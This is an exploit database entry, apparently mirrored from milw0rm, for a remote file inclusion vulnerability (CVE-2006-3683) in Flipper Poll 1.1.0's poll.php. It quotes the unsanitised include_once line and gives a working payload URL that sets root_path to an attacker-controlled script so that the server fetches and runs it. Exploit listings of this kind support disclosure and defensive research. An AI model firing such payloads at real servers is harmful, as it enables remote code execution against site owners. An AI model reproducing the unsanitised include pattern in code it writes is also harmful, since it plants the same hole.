Flipper Poll 1.1.0 - 'poll.php?root_path' Remote File Inclusion
Author: Mehmet Ince
type: webapps
platform: php
port: nan
date_added: 2007-02-01
date_updated: 2016-09-27
verified: 1
codes: OSVDB-26503;CVE-2006-3683
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comFlipper-Poll-v1.1.0.tar.gz
Flipper Poll v1.1.0 (poll.php) remote file include vuln
---------------------------------------------------------------------------------
Found: Cyber-Security
cyber-security.org
---------------------------------------------------------------------------------
Script Download: http://sourceforge.net/project/showfiles.php?group_id=59828
---------------------------------------------------------------------------------
Vuln Code: include_once($root_path . 'config.php');
---------------------------------------------------------------------------------
Exploit: /poll.php?root_path=evilscripts?
---------------------------------------------------------------------------------
Reference: http://www.cyber-security.org/DataDetayAll.Asp?Data_id=596
---------------------------------------------------------------------------------
# milw0rm.com [2007-02-02]